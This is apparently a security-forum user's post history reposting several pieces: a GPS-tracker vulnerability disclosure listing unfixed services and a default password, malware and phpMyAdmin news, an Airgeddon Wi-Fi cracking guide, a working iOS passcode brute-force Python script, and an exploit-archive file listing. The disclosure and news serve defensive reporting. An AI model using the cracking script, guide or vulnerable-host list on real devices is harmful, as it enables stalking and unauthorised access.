Jump to content

OKQL

Active Members
  • Content count

    2519
  • Joined

  • Last visited

  • Days Won

    60

Everything posted by OKQL

  1. (Published: 2018-01-02, Last update: 2018-01-04) We found vulnerabilities in the online services of (GPS) location tracking devices. These vulnerabilities allow an unauthorized third party (among other things) access to the location data of all location tracking devices managed by the vulnerable online services. This document summarizes the issues and answers the main questions for still affected users. For the technical details you can read the technical advisories. Unfortunately, we were only able to establish communication with One2Track, the intermediate vendor of www.one2trackgps.com. One2Track responded promptly outside regular business hours (on a Saturday) and implemented the fixes over the weekend (deployed the following Monday). One2Track has issued a statement for their customers regarding this disclosure. Thinkrace, the company we believe to be the original developer of the location tracking online service software and seller of licenses to the software, but only operator of some of the vulnerable online services eventually agreed to fix grapi.5gcity.com, wagps.net, www.wagps.net and love.iotts.net (in addition to the already fixed www.one2trackgps.com, kiddo-track.com, and www.amber360.com) by 2018-01-02. All online services (except 4, including www.one2trackgps.com) did not contain any contact information and contact attempts to the contact email addresses given in the WHOIS records of the domains were not answered either or answered by entities not responsible nor in direct control of the online services. We therefore hereby inform the users of the still vulnerable online services of the potential privacy and security risks involved in continuing using the location tracking devices that are managed by the still vulnerable online services. Fixed online services (NOT vulnerable): We received notifications and acknowledged that vendors have fixed the following online services. https://www.one2trackgps.com (fixed 2017-11-27) http://kiddo-track.com (fixed 2017-11-27) http://www.amber360.com (fixed 2017-11-27) http://tr.3g-elec.com (fixed 2017-12-18, subdomain removed) http://manage.5gcity.com (fixed 2018-01-04) http://grapi.5gcity.com (fixed 2018-01-04) Still vulnerable online services: Maybe fixed online services (not vulnerable to our proof of concept exploits anymore): There have been several online services that stopped being vulnerable to our automated proof of concept code, but because we never received a notification by a vendor that they fixed them, it could be that the services come back online again as vulnerable. http://www.nikkogps.com (domain has expired on 2017-11-30) http://www.igps.com.my (API returns an error) http://app.gpsyeah.com (only API access restricted) http://gps.nuoduncar.com (whole page returns error code 500) http://hytwuliu.cn (server times out) http://www.tourrun.net (server times out) http://vnetgps.net (API seems to only return empty data) http://www.999gpstracker.com (API returns error) http://www.trackerghana.com (API returns error) http://www.suntrackgps.com (API returns error) http://www.sledovanivozidel.eu (API returns error) http://www.response1gps.com (API returns error) http://www.inosiongps.com (API returns error) http://www.carzongps.com (API returns error) http://kids.topwatchhk.com (fixed) Pending fixes: We have been told by the vendor that these online services will be fixed by 2018-01-02 16:00 UTC. These online services are currently still vulnerable but the vendor is in the process of fixing. We will update as soon as the vendor notifies us and we can verify fixes. http://wagps.net (partially fixed, directory listings removed, API still openly accessible) http://www.wagps.net (partially fixed, directory listings removed, API still openly accessible) http://love.iotts.net (partially fixed, directory listings removed, API still openly accessible) Unfixed: http://www.gps958.com http://m.999gps.net http://www.techmadewatch.eu http://www.jimigps.net http://www.9559559.com http://www.goicar.net http://www.tuqianggps.com http://vitrigps.vn http://www.coogps.com http://greatwill.gpspingtai.net http://www.cheweibing.cn http://car.iotts.net http://carm.gpscar.cn http://watch.anyixun.com.cn http://www.007hwz.com http://www.thirdfang.com http://www.wnxgps.cn http://binding.gpsyeah.net http://chile.kunhigps.cl http://portal.dhifinder.com http://www.bizgps.net http://www.gpsmarvel.com http://www.mygps.com.my http://www.mygpslogin.net http://www.packet-v.com http://login.gpscamp.com http://www.tuqianggps.net http://tuqianggps.net http://www.dyegoo.net http://tracker.gps688.com http://www.aichache.cn http://gtrack3g.com http://www.ciagps.com.tw http://www.fordonsparning.se http://www.gm63gps.com http://yati.net http://www.mytracker.my http://www.istartracker.com http://www.twogps.com http://www.gpsyue.com http://www.xmsyhy.com http://www.icaroo.com http://mootrack.net http://spaceeyegps.com http://www.freebirdsgroup.com http://www.gpsmitramandiri.com http://www.silvertrackersgps.com http://www.totalsolutionsgps.com http://567gps.com http://gps.tosi.vn http://gps.transport-duras.com http://thietbigps.net http://mygps.co.id http://www.gpsuser.net http://www.mgoogps.com http://www.gpscar.cn http://www.aichache.net http://www.gpsline.cn http://2.tkstargps.net http://ephytrack.com http://www.squantogps.com http://www.tkgps.cn http://vip.hustech.cn http://www.blowgps.com http://www.zjtrack.com http://fbgpstracker.com http://gps.gpsyi.com http://www.crestgps.com http://www.spstrackers.com http://en.gps18.com http://en.gpsxitong.com http://gps18.com http://en2.gps18.com http://ry.gps18.com http://www.ulocate.se http://classic.gpsyeah.com http://www.gpsyeahsupport.top http://gpsui.net http://vmui.net Am I affected? If you manage your location tracking device via one of the above online services listed under “still vulnerable” or your location tracking device replies with an SMS containing a link to one of the domains listed under “still vulnerable” then you are affected. What can/should I do? Change your password for the online services! The default password for these services seems to be 123456. This default password will not adequately protect you, even if your device is managed by an online service that is not vulnerable. For gpsui.net you can not change the password. The password seems to be hardcoded into the tracking device. However, the password seem to be 6 random digits, which provides slightly better protection than 123456. Stop using still affected devices As long as the online service managing your device is still vulnerable changing your password will not matter and there is unfortunately not much you can currently do to protect yourself besides stopping to use the device. While your location history will remain publicly accessible via the vulnerable online service until it is fixed, shutdown or the data is deleted, by stopping to use the device you can prevent more of your personal data being exposed your live location being monitored (which we rate a much higher privacy and security risk than historic location data) other features of your location tracking device being abused. If you use an OBD GPS tracker that allows to immobilize your car and it is managed via a vulnerable online service we urge you to immediately detach it from your car and stop using it. Remove as much data as you can from the still vulnerable online services If you have personalized your device, e.g. given it a custom name (e.g. your car brand), or assigned phone numbers via the online service, you should change and/or delete those. While the location history remains on the websites, there is no history (that we know of) for names or phone numbers assigned to devices. This way you are at least able to delete some of your private information from the still vulnerable online services. If your device is managed via gpsui.net or vmui.net your location history is only stored for the past 7 days. Hence, not using the device for 7 days is enough to delete your location history from the online service. However, the last location can still be queried, hence, we advice you take the device away from a sensitive location to a place that does not threaten your privacy if revealed, e.g. a public parking lot, and activate the device for one last time. This way after 7 days the only exposed information will be the location of the public parking lot. When will the still vulnerable online services be fixed? We do not know. We could not establish communication with any of the “still vulnerable” online services and hence do not have any information on possible planned fixes. Hence, we assume there will be no fixes. This is why we release this information to the public even though no fixes for all affected online services are available, see our disclosure rationale for more details on this decision. Given that very similar (possibly even identical) issues have been found by “skooch” already in 2015 (see story by The Register and slides from Unrestcon) there may never be any fixes at all. What is the impact of the vulnerabilities? For a full technical summary of the impact and exploitation details we refer to the technical advisories. A summary of the impact and requirements by an attacker are as follows: Verified Due to the number of affected sites and the lack of test devices for all of them we could only verify the following for all affected online services: An unauthorized third party can access the location model/type name (feature not present on gpsui.net and vmui.net) SN (serial number, i.e. IMEI) assigned phone number custom assigned name (feature not present on gpsui.net and vmui.net) of all location tracking devices managed by a vulnerable online service. For gpsui.net and vmui.net this requires the unauthorized third party to be authenticated, i.e. logged into the service as any user, but due to the vulnerability is able to access data and act on behave of other users. For the rest of the online services no authentication is required at all. Partially verified Via test devices we were able to verify the following for gpsui.net and www.gps958.com: An unauthorized third party can access the location history of (1 week for gpsui.net, indefinitely for www.gps958.com) send commands (the same that can be send via SMS) to activate and/or deactivate geo fencing alarm of all location tracking devices managed by a vulnerable online service. For gpsui.net this requires the unauthorized third party to be authenticated, i.e. logged into the service as any user, but due to the vulnerability is able to access data and act on behave of other users. For www.gps958.com no authentication is required at all. Due to subtile API changes and different feature sets present in each different affected online service we can not say with certainty whether these additional attacks would also work against all affected online services, but we believe as long as the user interface of the online service offers a specific feature it can also be abused in the same fashion as we exploited the verified vulnerabilities against all online services. On some online services directory listings on the website allow an unauthorized third party to access: images uploaded by audio recordings uploaded by (we presume) location tracking devices. But please do not panic, we are certain that only devices which explicitly have this feature built-in upload images and audio and also only when this feature is actually used. But we did not have a device to test this. We only found the uploaded files. Unverified Other features potentially accessible by an unauthorized third party via the unsecured APIs that we could (due to the lack of a test device) not verify at all: access to OBD features on OBD GPS trackers, such as car immobilization as previously presented by “skooch” (story by The Register and slides from Unrestcon) upload of device firmware These last unverified potential vulnerabilities are not present in gpsui.net and vmui.net Why do you disclose this before all online services are fixed? We used to have a long disclosure rationale here, but because the situation has changed dramatically after we made the decision to disclose and we continuously evaluate the situation resulting in first cutting our initial communicated deadline shorter (due to lack of vendor response from still affected vendors) then in the end extending the deadline (due to sudden vendor responsiveness), in the end our disclosure rationale was read able anymore. In the end, it boils down to this: We tried to give the vendors enough time to fix (also respond for that matter) while we weighted this against the current immediate risk of the users. We understand that only a vendor fix can remove user’s location history (and any other stored user data for that matter) from the still affected services but we (and I personally because my data is also on one of those sites) judge the risk of these vulnerabilities being exploited against live location tracking devices much higher than the risk of historic data being exposed. We concluded that the historic location information of users does not pose a direct immanent critical risk to a user. Because, while it is true that an attacker can obtain location information from still vulnerable online services, this location information is at first anonymous. In order to de-anonymize a specific user, i.e. identify which device belongs to which user, an attacker must already know a specific user’s location, or a likely location, e.g. the user’s home, then correlate this known location with all locations queried from the online services. Eventually identifying a location tracking device potentially used by that particular user. Only at that point can an attacker manipulate and track a specific user’s device. It is at this point that we see the most immanent risk to a user because now their live location can be queried from their device. Hence, a user that is not actively using a device that is managed by a still vulnerable site is protected from any more devastating direct critical risk, such as stalking or surveillance. Therefore the sooner users of the still vulnerable online services are informed the sooner they can protect themselves from potential attacks. Do you think this disclosure was done wrong? We understand that you may have a different opinion on how this should have been disclosed. In this case we would like to point out that many of the online services are still not fixed! Hence, we would like to use this perfect opportunity to invite you to try and inform the vendors yourself in a fashion that you think will get these online services fixed. Good luck! We really appreciate your help! Technical advisories Warning the technical advisories represent the state of the vulnerable online services as we first discovered them, we only updated the timelines in the advisories. 0x0-gpsui.net.html .txt (concerning gpsui.net and vmui.net) 0x0-gpsgate.html .txt (concerning the rest) We redacted some information from the advisories, namely: proof of concept exploits, which would allow even non-technical persons to exploit these vulnerabilities some sensitive exploitable information that has not already been disclosed by “skooch” in 2015 (see story by The Register and slides from Unrestcon) Even with our redacted information, technical experts in the field should be able to verify our findings with ease. Acknowledgments Vangelis @evstykas Stykas discovered the vulnerabilities. We would also like to thank One2Track for their fast response and for helping us reach out to Thinkrace in an effort to dissipate the fixes deployed to www.one2trackgps.com to the other affected online services. If you have any questions or need clarification you can reach out to me via Twitter (DMs are open no need to follow). I might not know all the answers though because this is quite a huge mess that we likely only scratched the surface. I will also likely prioritize press inquires first (to support responsible reporting) instead of individual user questions, thank you for your understanding. Source: https://0x0.li/trackmageddon/
  2. Symantec Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned. On Thursday, cybersecurity researchers from FireEye's Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East. The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity. Stuxnet was one of the first indicators that such malware exists after the worm was used against industrial players in Iran in 2010, and in 2014, a South Korean nuclear facility was targeted. In 2016, Ukraine's capital Kiev had a power outage after malware took down a power grid. The new Trojan, which Symantec researchers say has been active since at least August this year, has been designed to communicate with a specific type of industrial control system (ICS), namely safety instrumented systems (SIS) controllers produced by Triconex. Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec -- while it is early days into the investigation -- the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage. In the case of the victim company, Triton was used to target emergency shutdown capabilities. However, the security researchers believe Triton was intended for use in "causing physical damage," but the plant was shut down inadvertently during the attack instead. The malware was deployed in order to reprogram the SIS controllers but some of the devices entered a failed safe state which closed the plant down and alerted operators to the scheme. The majority of cyberattackers have money in mind when they deploy malware or infiltrate systems, whether it be to clear out customer accounts or to steal valuable corporate data. However, in this case, there was no clear financial goal -- but the groups' persistence, skill, the targeting of core infrastructure, and what appears to be resources at their disposal all points towards state sponsorship. In October, the FBI and US Department of Homeland Security (DHS) warned that energy companies are now under constant attack by threat actors seeking to steal information related to their control systems. Firms in the energy, nuclear, water, aviation, and critical manufacturing sectors are at risk, according to the agencies, from hackers which target small firms as stepping stones towards more valuable companies. Via zdnet.com
  3. A weak password is one that is short, common, or easy to guess. Equally bad are secure but reused passwords that have been lost by negligent third-party companies like Equifax and Yahoo. Today, we will use Airgeddon, a wireless auditing framework, to show how anyone can crack bad passwords for WPA and WPA2 wireless networks in minutes or seconds with only a computer and network adapter. To follow this guide, you'll need a wireless network adapter capable of monitor mode and packet injection. You will also need a computer capable of running VirtualBox, an open-source hypervisor, software that can create and run multiple virtual machines. This should be easy since VirtualBox has downloads for Windows, macOS, and Linux. You can also download a copy of Parrot Security OS (aka ParrotSec) to run in VirtualBox if you'd like everything to work like in our video guide below. If you want to download the ParrotSec ISO but you'd also like to stay off any NSA lists, you can always use a proxy server to download the image file while hiding your IP address. If you're already set up on Arch or Kali Linux, you can also install Airgeddon and any dependencies following the directions on GitHub, and then follow along. One thing to note: Airgeddon needs to open other windows to work, so this won't work via SSH (Secure Shell), only VNC (Virtual Networking Computer) or with a screen. As you can see in the video above, a WPA handshake can be grabbed in seconds, leaving the strength of your password as your last line of defense. If this can't stand up to a reasonable assault, your data is as good as gone if an attacker decides to knock on the door of your network. If you're looking for some help, there are plenty of ways to prevent yourself from being easy to attack with this method. Never reuse passwords, and always make sure to use secure passwords hackers won't like. Password managers like LastPass also allow you to create and sync secure passwords that are much harder to brute-force. Lastly, never share your Wi-Fi password when you don't need to, and change it regularly if you have to share your password at all. Thanks for watching, please subscribe to Null Byte on YouTube for more content, and happy cracking! Follow Null Byte on Twitter, Google+, and YouTube Follow WonderHowTo on Facebook, Twitter, Pinterest, and Google+ Source: https://null-byte.wonderhowto.com/how-to/video-crack-weak-wi-fi-passwords-seconds-with-airgeddon-parrot-os-0181434/
  4. iOS Restriction Passcode Brute Force Overview This version of the application is written in Python, which is used to crack the restriction passcode of an iPhone/iPad takes advantage of a flaw in unencrypted backups allowing the hash and salt to be discovered. Bruteforce Get the Base64 key and salt from the backup file in Computer. Decode the Base64 key and salt. Try from 1 to 9999 to with the pbkdf2-hmac-sha1 hash with Passlib How to Use Make sure to use iTunes to backup the iOS device to computer Run ioscrack.py python ioscrack.py Dependencies This has been tested with Python 2.6 and 2.7. Requires Passlib 1.7 Install with: pip install passlib License MIT License Download: iOSRestrictionBruteForce-master.zip git clone https://github.com/thehappydinoa/iOSRestrictionBruteForce.git Mirror: ioscrack.py #!/usr/bin/python # Filename: ioscrack.py from passlib.utils.pbkdf2 import pbkdf2 from time import time import os import sys import base64 HOMEDIR = '~/Library/Application Support/MobileSync/Backup/' def crack(secret64, salt64): print "secret: ", secret64 print "salt: ", salt64 secret = base64.b64decode(secret64) salt = base64.b64decode(salt64) start_t = time() for i in range(10000): key = "%04d" % (i) out = pbkdf2(key, salt, 1000) if out == secret: print "key: ", key duration = time() - start_t print "%f seconds" % (duration) sys.exit(0) print "no exact key" try: backup_dir = os.listdir(HOMEDIR) for bkup_dir in backup_dir: passfile = open(HOMEDIR + bkup_dir + "/398bc9c2aeeab4cb0c12ada0f52eea12cf14f40b", "r") line_list = passfile.readlines() secret64 = line_list[6][1:29] salt64 = line_list[10][1:9] crack(secret64, salt64) except Exception as e: while not secret64: secret64 = raw_input("Enter Secret Key: ") if secret64 < 3: secret64 = NONE while not salt64: salt64 = raw_input("Enter Salt: ") if salt64 < 10: salt64 = NONE crack(secret64, salt64) .travis.yml language: python python: - "2.6" - "2.7" install: - pip install pbkdf2 script: - py.test Source: https://github.com/thehappydinoa/iOSRestrictionBruteForce
  5. xDedic Socks System

    alternative http://www.youngzsoft.net/ccproxy/
  6. CryptoTracker An easy way to setup and manage your crypto currency portfolio from the terminal. (Using the Coin Market Cap API) Compatible with Python 2 and Python 3 Install python setup.py install Usage View coin data cryptotracker -i bitcoin xrp dash Convert fiat output cryptotracker -i bitcoin -c eur Add to portfolio cryptotracker -a btc --amt 2000 cryptotracker --add ripple --amt 5352 Remove from portfolio cryptotracker -rm btc View Portfolio cryptotracker -p Screenshot Download: CryptoTracker-master.zip git clone https://github.com/Max00355/CryptoTracker.git Source: https://github.com/Max00355/CryptoTracker
  7. A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link. Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7). Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwanted action. According to an advisory released by phpMyAdmin, "by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc." phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms. Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases. Barot has also released a video, as shown above, demonstrating how a remote attacker can make database admins unknowingly delete (DROP) an entire table from the database just by tricking them into clicking a specially crafted link. However, performing this attack is not simple as it may sound. To prepare a CSRF attack URL, the attacker should be aware of the name of targeted database and table. Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible. Source: thehackernews.com
  8. Complete comprehensive archive of all 2,645 exploits added to Packet Storm in 2017. Content: Directory of \2017-exploits 01/02/2018 06:02 PM <DIR> . 01/02/2018 06:02 PM <DIR> .. 02/01/2017 02:38 AM <DIR> 1701-exploits 03/02/2017 02:51 PM <DIR> 1702-exploits 01/02/2018 06:00 PM <DIR> 1703-exploits 05/01/2017 05:27 PM <DIR> 1704-exploits 06/01/2017 12:57 AM <DIR> 1705-exploits 07/01/2017 05:46 PM <DIR> 1706-exploits 08/04/2017 06:46 AM <DIR> 1707-exploits 09/01/2017 01:05 AM <DIR> 1708-exploits 10/12/2017 04:37 PM <DIR> 1709-exploits 11/01/2017 05:30 PM <DIR> 1710-exploits 12/01/2017 04:03 AM <DIR> 1711-exploits 01/01/2018 03:38 AM <DIR> 1712-exploits 2 File(s) 828 bytes Directory of \2017-exploits\1701-exploits 02/01/2017 02:38 AM <DIR> . 02/01/2017 02:38 AM <DIR> .. 02/01/2017 02:28 AM 433,429 1701-exploits.tgz 01/15/2017 05:22 AM 836 9networklinkedinclone-direct.txt 01/27/2017 05:13 AM 2,198 abm-dos.txt 01/29/2017 04:33 AM 5,081 adaptcms303-upload.txt 01/08/2017 04:33 AM 763 adl-bypass.txt 01/15/2017 06:22 AM 655 adsseo32-direct.txt 01/21/2017 04:03 PM 913 alpstouchpad-escalate.txt 01/13/2017 11:24 PM 3,772 asc-overflow.tgz 01/31/2017 01:39 AM 1,054 auction649-sql.txt 01/19/2017 02:31 AM 482 auctionwebsite-sql.txt 01/21/2017 04:05 PM 851 b2balibabaclone-sql.txt 01/19/2017 02:08 AM 1,794 b2bscript427-sql.txt 01/16/2017 03:22 AM 894 bns811-sqlxss.txt 01/17/2017 05:01 PM 3,451 BOZON-PRE-AUTH-COMMAND-EXECUTION.txt 01/09/2017 06:01 PM 1,381 bravebrowser-spoof.txt 01/19/2017 02:28 AM 712 businessdirscript-sql.txt 01/19/2017 02:27 AM 675 buysellmps-sql.txt 01/31/2017 01:40 AM 733 caregiver257-sql.txt 01/10/2017 12:22 AM 34,674 cemu164b-leakoverflow.tgz 01/06/2017 02:36 AM 6,974 chakra-2016-11-master.zip 01/17/2017 02:03 PM 2,575 checkbox2016-traversal.txt 01/12/2017 01:33 AM 9,000 cisco_firepower_useradd.rb.txt 01/21/2017 03:59 PM 414 classifiedsscript-sql.txt 01/19/2017 02:19 AM 434 cloneofoddee113-sql.txt 01/21/2017 04:15 PM 2,315 complainmgmtsystem-sql.txt 01/12/2017 01:44 AM 91,696 COSIG-2017-01.tgz 01/19/2017 02:12 AM 3,688 couriermgmt-sqlxss.txt 01/13/2017 06:22 PM 2,866 cpanel-xssdisclose.txt 01/12/2017 01:32 AM 12,216 CT-2017-0109.txt 01/19/2017 02:26 AM 715 dentistwebsite-sql.txt 01/08/2017 03:02 AM 2,540 directadmincp1501-dos.txt 01/09/2017 08:11 PM 2,697 directadmincp1501-xss.txt 01/17/2017 04:59 PM 4,445 DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt 01/10/2017 11:22 AM 2,823 diskboss7512-overflow.txt 01/14/2017 01:18 AM 3,432 diskboss_get_bof.rb.txt 01/21/2017 04:29 PM 3,832 disksavvy_get_bof.rb.txt 01/13/2017 11:41 PM 2,819 dlinkdir615-redirxss.txt 01/21/2017 04:13 PM 576 dms11-sql.txt 01/21/2017 04:14 PM 1,182 easyphpwss-escalate.txt 01/15/2017 05:44 AM 475 ejpsseo13-sql.txt 01/09/2017 11:11 AM 19,534 enigma_fileless_uac_bypass.rb.txt 01/23/2017 05:54 PM 4,534 ERPSCAN-17-005.txt 01/23/2017 05:56 PM 7,727 ERPSCAN-17-006.txt 01/13/2017 09:02 PM 4,100 ff-uaf.txt 01/19/2017 02:32 AM 507 fileserveclone-sql.txt 01/19/2017 02:30 AM 486 financewebsite-sql.txt 01/24/2017 02:11 AM 8,247 firefox_smil_uaf.rb.txt 01/12/2017 01:01 AM 10,785 firejail-escalate.txt 01/19/2017 02:10 AM 699 flippawebsite-sql.txt 01/10/2017 05:22 PM 1,148 fmylifeclonescript-xsrf.txt 01/13/2017 11:27 PM 1,617 freelancerscript511-sql.txt 01/01/2017 05:44 AM 3,182 freem4amp3-dllhijack.txt 01/09/2017 05:44 AM 2,016 freepbx21115-exec.txt 01/27/2017 04:33 AM 14,050 geutebrueck-overflow.rb.txt 01/22/2017 04:33 AM 5,764 gmp-exec.txt 01/27/2017 05:27 AM 1,153 gnuscreen-escalate.txt 01/27/2017 02:32 AM 1,027 gnuscreen450-escalate.txt 01/03/2017 04:55 PM 1,620 GS20170104021751.tgz 01/03/2017 06:32 PM 1,732 GS20170104021852.tgz 01/03/2017 06:44 PM 3,204 GS20170104022335.tgz 01/05/2017 09:39 PM 2,397 GS20170105203933.tgz 01/18/2017 04:55 PM 2,108 GS20170118171440.tgz 01/24/2017 01:35 AM 1,902 GS20170124003533.tgz 01/24/2017 01:37 AM 4,571 GS20170124003720.tgz 01/26/2017 07:32 PM 2,570 GS20170127035345.tgz 01/26/2017 03:44 PM 1,742 GS20170127035510.tgz 01/26/2017 04:02 PM 2,346 GS20170127035729.tgz 01/26/2017 05:22 PM 1,338 GS20170127035853.tgz 01/26/2017 04:22 PM 2,109 GS20170127040045.tgz 01/31/2017 02:24 AM 15,185 hackingprinters-1.txt 01/31/2017 02:26 AM 8,451 hackingprinters-2.txt 01/27/2017 05:12 AM 6,465 haraka-exec.txt 01/16/2017 06:22 AM 1,974 hassiumcms-xss.txt 01/30/2017 01:22 PM 7,056 helpdeskz-sqldownload.txt 01/21/2017 04:02 PM 1,021 hphotkeyss-escalate.txt 01/21/2017 04:00 PM 470 hvivas-sql.txt 01/21/2017 04:07 PM 609 icaffiliatetracking-sql.txt 01/21/2017 04:15 PM 558 icgamesgss-sql.txt 01/21/2017 04:09 PM 574 icjobsite-sql.txt 01/21/2017 04:11 PM 566 ictutorstss-sql.txt 01/16/2017 08:32 AM 2,352 imagesharingscript413-sqlxss.txt 01/21/2017 04:04 PM 426 imagevideoscript-sql.txt 01/03/2017 01:22 PM 6,087 internetdownloadaccel-overflow.txt 01/16/2017 11:02 PM 2,025 iselect-overflow.txt 01/31/2017 01:38 AM 1,404 itechb2b428-sql.txt 01/31/2017 01:36 AM 1,190 itechclassifieds727-sql.txt 01/30/2017 03:22 AM 1,050 itechdating326-sql.txt 01/30/2017 02:11 AM 1,208 itechfreelancer513-sql.txt 01/31/2017 05:22 AM 1,662 itechmvs649-sql.txt 01/31/2017 04:33 AM 1,254 itechnewsportal628-sql.txt 01/30/2017 03:44 PM 564 itechrealestate312-sql.txt 01/18/2017 04:55 PM 2,243 itechscriptspgs-sql.txt 01/18/2017 03:44 PM 2,245 itechscriptsvss-sqlxss.txt 01/19/2017 02:59 PM 2,456 JAVA-SE-MISSION-CONTROL-MITM.txt 01/13/2017 11:37 PM 470 jobportalscript911-sql.txt 01/21/2017 04:01 PM 431 jobvacancyscript-sql.txt 01/28/2017 08:32 AM 645 joomlajtag624-sql.txt 01/28/2017 12:21 PM 530 joomlastorelocator2310-xss.txt 01/19/2017 02:29 AM 508 justdialclonescript-sql.txt 01/27/2017 05:19 AM 623 kbaffiliate-sql.txt 01/27/2017 05:18 AM 589 kbloginas-sql.txt 01/27/2017 05:17 AM 587 kbmessagesphpscript-sql.txt 01/17/2017 04:55 PM 6,549 lfi_attack_for_direct_download_woocommerce.py.txt 01/29/2017 04:55 PM 1,076 maianweblog40-sql.txt 01/18/2017 06:01 PM 1,330 mailzu08rc3-xss.txt 01/10/2017 02:03 PM 1,605 makeorbreak17-sql.txt 01/27/2017 02:11 AM 12,749 mandb-escalate.txt 01/19/2017 02:25 AM 710 manufacturerwds-sql.txt 01/15/2017 08:02 AM 802 mcbscs-sql.txt 01/15/2017 03:22 AM 879 mccomingsoon-upload.txt 01/15/2017 02:11 AM 724 mcdcs-sql.txt 01/15/2017 05:02 AM 1,681 mchcs-xsrf.txt 01/15/2017 04:22 AM 1,239 mcims-sql.txt 01/15/2017 06:02 AM 682 mcreps-direct.txt 01/15/2017 08:02 AM 800 mcsss-sql.txt 01/15/2017 07:02 AM 698 mcyps-sql.txt 01/15/2017 04:55 PM 8,910 meadmanagerplus-sqlxss.txt 01/19/2017 02:33 AM 726 medicalclinic-sql.txt 01/19/2017 02:25 AM 947 microblogscript-sql.txt 01/16/2017 04:03 AM 430 millionpixels3-sql.txt 01/21/2017 04:10 PM 561 miniblog11-sql.txt 01/21/2017 04:07 PM 558 minicms11-sql.txt 01/12/2017 01:20 AM 700 movieportal735-sql.txt 01/31/2017 06:05 PM 2,515 mrf_web_panel_os_cmd_injection.txt 01/12/2017 01:02 AM 26,771 ms16135-escalate.txt 01/22/2017 05:44 AM 2,698 mspowerpoint-exec.txt 01/12/2017 01:03 AM 10,219 mswin81rgnobj-overflow.txt 01/21/2017 04:08 PM 556 musicsitescript12-sql.txt 01/03/2017 10:32 AM 519 myclickcounter-sql.txt 01/08/2017 04:33 AM 471 mylinktrader-sqlbypass.txt 01/29/2017 05:22 PM 1,142 myphotogallery10-sql.txt 01/09/2017 05:46 PM 1,500 myphpdating20-sql.txt 01/09/2017 06:02 PM 424 myphpdating20id-sql.txt 01/19/2017 02:24 AM 890 myprivatetutor-sql.txt 01/31/2017 05:22 AM 1,427 netman204-backdoorreset.txt 01/19/2017 02:23 AM 1,022 ngodirectory-sql.txt 01/19/2017 02:22 AM 924 ngowebsite-sql.txt 01/27/2017 05:21 AM 2,115 not_an_sshnuke.c 01/21/2017 04:23 PM 3,161 NTOPNG-CSRF-TOKEN-BYPASS.txt 01/09/2017 05:22 PM 1,744 nukedklan-upload.txt 01/29/2017 03:44 PM 590 ohbsp12-sql.txt 01/13/2017 11:35 PM 480 onlinefooddelivery-sql.txt 01/19/2017 02:20 AM 693 onlinemrs-sql.txt 01/19/2017 02:16 AM 723 onlinepbcs-sql.txt 01/19/2017 02:15 AM 647 onlinetds-sql.txt 01/18/2017 05:40 PM 1,618 openexpert0517-sql.txt 01/18/2017 05:41 PM 593 openexpert0517-xss.txt 01/31/2017 01:45 AM 5,838 openssl110-dos.txt 01/16/2017 02:21 AM 605 openwysiwyg147-upload.txt 01/23/2017 12:22 AM 880 Oracle-ERP-CVE-2017-3277.txt 01/22/2017 07:22 AM 2,961 pagekit1011-reset.txt 01/31/2017 01:43 AM 7,660 pantsa-overflow.txt 01/03/2017 06:55 AM 2,961 pdfadd12-dllhijack.txt 01/29/2017 01:21 PM 3,867 PEAR-ARBITRARY-FILE-DOWNLOAD.txt 01/26/2017 04:12 PM 3,644 PEAR-HTTP_UPLOAD-ARBITRARY-FILE-UPLOAD.txt 01/27/2017 01:22 AM 2,501 phpback-sqlxss.txt 01/17/2017 03:34 AM 7,442 phplibgd-overflow.txt 01/31/2017 02:11 AM 1,021 phplogodesigner-upload.txt 01/04/2017 02:42 AM 4,714 phpmailer_arg_injection.rb.txt 01/31/2017 03:22 AM 1,065 phpproductdesigner-upload.txt 01/17/2017 03:20 AM 3,123 pirellidrga115-dnschange.txt 01/19/2017 03:04 PM 3,129 pirellidrga115v3-dnschange.sh.txt 01/27/2017 05:16 AM 1,334 polycom-escalate.txt 01/03/2017 06:32 PM 8,808 pwnscriptum-exec.txt 01/23/2017 02:11 AM 3,231 py2x_bof.py.txt 01/04/2017 06:04 PM 9,547 qnap-exec.txt 01/19/2017 02:21 AM 476 questionandanswers113-sql.txt 01/06/2017 04:55 PM 2,892 quickbooks-disclose.txt 01/19/2017 03:05 PM 4,146 RCESEC-2016-012.txt 01/12/2017 01:03 AM 16,104 responsivefm-xss.txt 01/10/2017 11:22 PM 2,508 responsivepoll-xssxsrf.txt 01/13/2017 09:22 PM 2,991 roxyfileman-xss.txt 01/09/2017 05:44 AM 1,329 rumblemailserver-xss.txt 01/13/2017 11:20 PM 726 saplpd-dos.txt 01/13/2017 11:26 PM 626 schoolmgmt275-sql.txt 01/31/2017 02:03 AM 6,050 secuvera-SA-2017-01.txt 01/18/2017 06:07 PM 2,876 sentryhd_privilege_escalation.py.txt 01/23/2017 05:52 PM 4,916 SGMA16-004-poc.txt 01/19/2017 02:14 AM 712 shikshaews-sql.txt 01/21/2017 04:03 PM 469 snbs-sql.txt 01/04/2017 04:33 AM 4,403 softmakeroffice-escalate.txt 01/31/2017 01:57 AM 3,377 sophos-exec.txt 01/08/2017 06:55 AM 1,347 splunk611referer-xss.txt 01/10/2017 03:44 PM 396 startingpage13-sql.txt 01/19/2017 02:13 AM 726 studyabroadews-sql.txt 01/21/2017 04:25 PM 2,690 sunos511.c 01/27/2017 05:22 AM 6,169 systemd228-escalate.txt 01/17/2017 03:22 AM 3,127 